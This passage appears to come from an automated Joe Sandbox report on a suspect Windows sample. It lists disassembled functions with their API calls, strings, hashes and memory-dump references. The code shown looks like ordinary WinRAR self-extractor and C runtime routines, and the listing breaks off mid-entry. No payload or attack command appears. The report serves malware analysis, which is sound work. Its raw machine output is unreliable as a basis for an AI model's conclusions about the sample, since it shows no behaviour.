                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,2DE85006,002947C6,00000000,00000000,002957FB,?,002957FB,?,00000001,002947C6,2DE85006,00000001,002957FB,002957FB), ref: 0029C9D5
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0029CA5E
                                                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0029CA70
                                                                                  • __freea.LIBCMT ref: 0029CA79
                                                                                    • Part of subcall function 00298E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00294286,?,0000015D,?,?,?,?,00295762,000000FF,00000000,?,?), ref: 00298E38
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                  • String ID:
                                                                                  • API String ID: 2652629310-0
                                                                                  • Opcode ID: 1c0e1f1b3c2c05d945981cf8ea1173a8e68db255443c1b3b95a5579eee98e926
                                                                                  • Instruction ID: 03b4fce0484390eab8989638535e134ea0878a23e0b88422a7ffd1e2b914af62
                                                                                  • Opcode Fuzzy Hash: 1c0e1f1b3c2c05d945981cf8ea1173a8e68db255443c1b3b95a5579eee98e926
                                                                                  • Instruction Fuzzy Hash: 2C31CF72A2021AABDF24DF64DC55EBE7BA5EF01310B254228FC04E7290EB35CD64CB90
                                                                                  Function 0028A663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetDC.USER32(00000000), ref: 0028A666
                                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 0028A675
                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0028A683
                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0028A691
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: CapsDevice$Release
                                                                                  • String ID:
                                                                                  • API String ID: 1035833867-0
                                                                                  • Opcode ID: 36616662f7fb62a8895a7387510d602e5f93d331487eb64201d2669b760fd2fa
                                                                                  • Instruction ID: daa164f695462cfd9cc3f1c1f995419c4b21cc48d8d8b63dee6adf1b5b310b49
                                                                                  • Opcode Fuzzy Hash: 36616662f7fb62a8895a7387510d602e5f93d331487eb64201d2669b760fd2fa
                                                                                  • Instruction Fuzzy Hash: D8E01231D53722B7D7619B60FC0DB8B3F68AB05B63F054212FA09D61D0DB748A00CBA2
                                                                                  Function 0028D06A Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 278COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcschr
                                                                                  • String ID: .lnk$d(
                                                                                  • API String ID: 2691759472-2429978066
                                                                                  • Opcode ID: f5c0266efeb304cf4bf346faf73e8a09aaba79a12834968cd8627479d27862c4
                                                                                  • Instruction ID: b7897640b5b7944f37940321eff49e128b12dd8d17f4df14f60761b5cc9d3e7c
                                                                                  • Opcode Fuzzy Hash: f5c0266efeb304cf4bf346faf73e8a09aaba79a12834968cd8627479d27862c4
                                                                                  • Instruction Fuzzy Hash: CFA1657692112A96DF24EBA0CD45EFA73FCAF44304F0485A6B50DE31C1EE749B988F61
                                                                                  Function 002775DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 002775E3
                                                                                    • Part of subcall function 002805DA: _wcslen.LIBCMT ref: 002805E0
                                                                                    • Part of subcall function 0027A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0027A598
                                                                                  • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0027777F
                                                                                    • Part of subcall function 0027A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0027A325,?,?,?,0027A175,?,00000001,00000000,?,?), ref: 0027A501
                                                                                    • Part of subcall function 0027A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0027A325,?,?,?,0027A175,?,00000001,00000000,?,?), ref: 0027A532
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                                                  • String ID: :
                                                                                  • API String ID: 3226429890-336475711
                                                                                  • Opcode ID: ec469e0a199f5e490734f130ac7710a7c6e279160926495f56bc19f1817b6ced
                                                                                  • Instruction ID: 67232db030b754c3921d82430959d2005a011c134e2df7c588a5e72dbda64495
                                                                                  • Opcode Fuzzy Hash: ec469e0a199f5e490734f130ac7710a7c6e279160926495f56bc19f1817b6ced
                                                                                  • Instruction Fuzzy Hash: 61417671815258AAEB25EB54CC55EEEB37CAF51300F408096B60DA7092DB745FA8CF71
                                                                                  Function 0027B37A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcschr
                                                                                  • String ID: *
                                                                                  • API String ID: 2691759472-163128923
                                                                                  • Opcode ID: caae801f151a734f762155d72bda329a3ade4b16414aa7b65ce6cba666fb4362
                                                                                  • Instruction ID: 36b06c23eaf278baf69b72c1ac1d16fc7c5e7c434474eb2cdc02455f097e8a75
                                                                                  • Opcode Fuzzy Hash: caae801f151a734f762155d72bda329a3ade4b16414aa7b65ce6cba666fb4362
                                                                                  • Instruction Fuzzy Hash: 69315526124303AACB32AE148836B7B73E4DFA5B14F14C01EFD8C57143E7768CA2A361
                                                                                  Function 0028B48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcslen
                                                                                  • String ID: }
                                                                                  • API String ID: 176396367-4239843852
                                                                                  • Opcode ID: 3c3d2e58b979e40762cf6ffd25fa277112690552298bc1d45cf4812cf613a4eb
                                                                                  • Instruction ID: d12389667e206bbeba6f5e27e1204a570ccba444c17702817463ca1a40e99419
                                                                                  • Opcode Fuzzy Hash: 3c3d2e58b979e40762cf6ffd25fa277112690552298bc1d45cf4812cf613a4eb
                                                                                  • Instruction Fuzzy Hash: 652101369263075ADB32FE64D845A6AB3DCDF81750F54042EF580C3181EB68D96887A2
                                                                                  Function 0027F344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0027F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0027F2E4
                                                                                    • Part of subcall function 0027F2C5: GetProcAddress.KERNEL32(002B81C8,CryptUnprotectMemory), ref: 0027F2F4
                                                                                  • GetCurrentProcessId.KERNEL32(?,?,?,0027F33E), ref: 0027F3D2
                                                                                  Strings
                                                                                  • CryptProtectMemory failed, xrefs: 0027F389
                                                                                  • CryptUnprotectMemory failed, xrefs: 0027F3CA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$CurrentProcess
                                                                                  • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                  • API String ID: 2190909847-396321323
                                                                                  • Opcode ID: fda0c143f571f0a8da0c7bad236c2d80dd3ac2077683fe2a1271cbeef19a1dde
                                                                                  • Instruction ID: e374878d93f3e4847214935773bc9cf3bbda291b81a39d48886748e4c2bf935d
                                                                                  • Opcode Fuzzy Hash: fda0c143f571f0a8da0c7bad236c2d80dd3ac2077683fe2a1271cbeef19a1dde
                                                                                  • Instruction Fuzzy Hash: A411AB3162926AABDF119F34EE09A6E3758FF01760B00C1A6FC0D5B251DE309E21CBC1
                                                                                  Function 0027C058 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcschr
                                                                                  • String ID: <9*$?*<>|"
                                                                                  • API String ID: 2691759472-4230767896
                                                                                  • Opcode ID: 7fd7842ca4c2ac8f4616e6090b16b4cfc3db6efeddb6f93ae0b1bcfe1a1db035
                                                                                  • Instruction ID: 827cd5069abf3cdb8965370aabe4a3fb7ec9daca3b60691b51c970fa26cb01d7
                                                                                  • Opcode Fuzzy Hash: 7fd7842ca4c2ac8f4616e6090b16b4cfc3db6efeddb6f93ae0b1bcfe1a1db035
                                                                                  • Instruction Fuzzy Hash: D2F08653965703D5C7345F349801736B3E4EFA5720F34841EE5CD871C2E5B188E096D5
                                                                                  Function 0028DB4B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcslen
                                                                                  • String ID: Software\WinRAR SFX$(
                                                                                  • API String ID: 176396367-2399739093
                                                                                  • Opcode ID: 053d8bcfbc37007d0d6ff48e87280ae3423aa0942c79286fa7f7db6d39e205b4
                                                                                  • Instruction ID: b6de96374a9d0e8828e88bc1c24563f904660dff4835dd43d723add4858dc3c9
                                                                                  • Opcode Fuzzy Hash: 053d8bcfbc37007d0d6ff48e87280ae3423aa0942c79286fa7f7db6d39e205b4
                                                                                  • Instruction Fuzzy Hash: 5F017C35912128BAEF21AB91EC0EFDB7F7CEB05395F004052B549A10A1D7B05AA8CBA1
                                                                                  Function 0028AE2F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0027C29A: _wcslen.LIBCMT ref: 0027C2A2
                                                                                    • Part of subcall function 00281FDD: _wcslen.LIBCMT ref: 00281FE5
                                                                                    • Part of subcall function 00281FDD: _wcslen.LIBCMT ref: 00281FF6
                                                                                    • Part of subcall function 00281FDD: _wcslen.LIBCMT ref: 00282006
                                                                                    • Part of subcall function 00281FDD: _wcslen.LIBCMT ref: 00282014
                                                                                    • Part of subcall function 00281FDD: CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0027B371,?,?,00000000,?,?,?), ref: 0028202F
                                                                                    • Part of subcall function 0028AC04: SetCurrentDirectoryW.KERNELBASE(?,0028AE72,C:\Users\user\Desktop,00000000,002B946A,00000006), ref: 0028AC08
                                                                                  • _wcslen.LIBCMT ref: 0028AE8B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcslen$CompareCurrentDirectoryString
                                                                                  • String ID: <($C:\Users\user\Desktop
                                                                                  • API String ID: 521417927-1886305182
                                                                                  • Opcode ID: 4d6f0682ba12056165b129fff98cc706bfca5eea526fac5efbc428a40dd98ddd
                                                                                  • Instruction ID: d4ac952d434e69ac5b4eace0092033ce64eb05ed15d04eac5dd20378e18f7197
                                                                                  • Opcode Fuzzy Hash: 4d6f0682ba12056165b129fff98cc706bfca5eea526fac5efbc428a40dd98ddd
                                                                                  • Instruction Fuzzy Hash: AE017575D2121966EF11BBA4ED0ADDE73BCAF09300F000466F605E31D1EAB49664CFA1
                                                                                  Function 0029BB4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 002997E5: GetLastError.KERNEL32(?,002B1098,00294674,002B1098,?,?,002940EF,?,?,002B1098), ref: 002997E9
                                                                                    • Part of subcall function 002997E5: _free.LIBCMT ref: 0029981C
                                                                                    • Part of subcall function 002997E5: SetLastError.KERNEL32(00000000,?,002B1098), ref: 0029985D
                                                                                    • Part of subcall function 002997E5: _abort.LIBCMT ref: 00299863
                                                                                  • _abort.LIBCMT ref: 0029BB80
                                                                                  • _free.LIBCMT ref: 0029BBB4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast_abort_free
                                                                                  • String ID: p*
                                                                                  • API String ID: 289325740-4114540210
                                                                                  • Opcode ID: 8eb79e9209ccc2b7077824f008d40e3ee727ccaf1c6d6e07d6063fdf2ddcc586
                                                                                  • Instruction ID: 574726886ac96b7355b08cf86b835d2eb5151820ad558e9ee952d56ca70878b4
                                                                                  • Opcode Fuzzy Hash: 8eb79e9209ccc2b7077824f008d40e3ee727ccaf1c6d6e07d6063fdf2ddcc586
                                                                                  • Instruction Fuzzy Hash: A201C435D21636DBCF22AF68A61121DF7B1BF05724B15010AEC24676D5CF746D228FC1
                                                                                  Function 0028B425 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: Malloc
                                                                                  • String ID: (($Z(
                                                                                  • API String ID: 2696272793-2098410053
                                                                                  • Opcode ID: 181453e849e834f5a4b664be7ef6082270db504e825ac381ec7db716ac6b0ead
                                                                                  • Instruction ID: 72b3049a45382fde89311b661c5d3ccbdbe84c9aacbe906bcfc26490a38eb5c2
                                                                                  • Opcode Fuzzy Hash: 181453e849e834f5a4b664be7ef6082270db504e825ac381ec7db716ac6b0ead
                                                                                  • Instruction Fuzzy Hash: E3014B7AA11109FF9F05DFB0EC49CAE7B6DEF08345710415AB906D7120E631AE44DB60
                                                                                  Function 00298268 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0029BF30: GetEnvironmentStringsW.KERNEL32 ref: 0029BF39
                                                                                    • Part of subcall function 0029BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0029BF5C
                                                                                    • Part of subcall function 0029BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0029BF82
                                                                                    • Part of subcall function 0029BF30: _free.LIBCMT ref: 0029BF95
                                                                                    • Part of subcall function 0029BF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0029BFA4
                                                                                  • _free.LIBCMT ref: 002982AE
                                                                                  • _free.LIBCMT ref: 002982B5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                                                  • String ID: 0"-
                                                                                  • API String ID: 400815659-960964311
                                                                                  • Opcode ID: ac32af571d380d52ffa33f13249c576328512e01c6acf1051dd97b42fed3098d
                                                                                  • Instruction ID: f070f704eaacb01e84e976baa23c2e87b34e5c495cbda05a84756da3d59ecddc
                                                                                  • Opcode Fuzzy Hash: ac32af571d380d52ffa33f13249c576328512e01c6acf1051dd97b42fed3098d
                                                                                  • Instruction Fuzzy Hash: 32E0E533E3698281AF61373A7D06A2F06044B93338B1C021AFE10C61C3CE5088360CA2
                                                                                  Function 00280FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,00281101,?,?,0028117F,?,?,?,?,?,00281169), ref: 00280FEA
                                                                                  • GetLastError.KERNEL32(?,?,0028117F,?,?,?,?,?,00281169), ref: 00280FF6
                                                                                    • Part of subcall function 00276C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00276C54
                                                                                  Strings
                                                                                  • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00280FFF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                  • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                  • API String ID: 1091760877-2248577382
                                                                                  • Opcode ID: f5a692c50e8af635a88eb089fadfbb3d5e5848f5ebcd10ea10e32e01071587ee
                                                                                  • Instruction ID: 9e720b0928dde8bb4a362b5e8a9960edf92ec872c9074a14be6f6a0f69a517b8
                                                                                  • Opcode Fuzzy Hash: f5a692c50e8af635a88eb089fadfbb3d5e5848f5ebcd10ea10e32e01071587ee
                                                                                  • Instruction Fuzzy Hash: F7D02B3151852037C61133246C0DD6F78048B23331B744709F53D601E5CE3049B14A97
                                                                                  Function 0027E29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                                                  Download Yara Rule
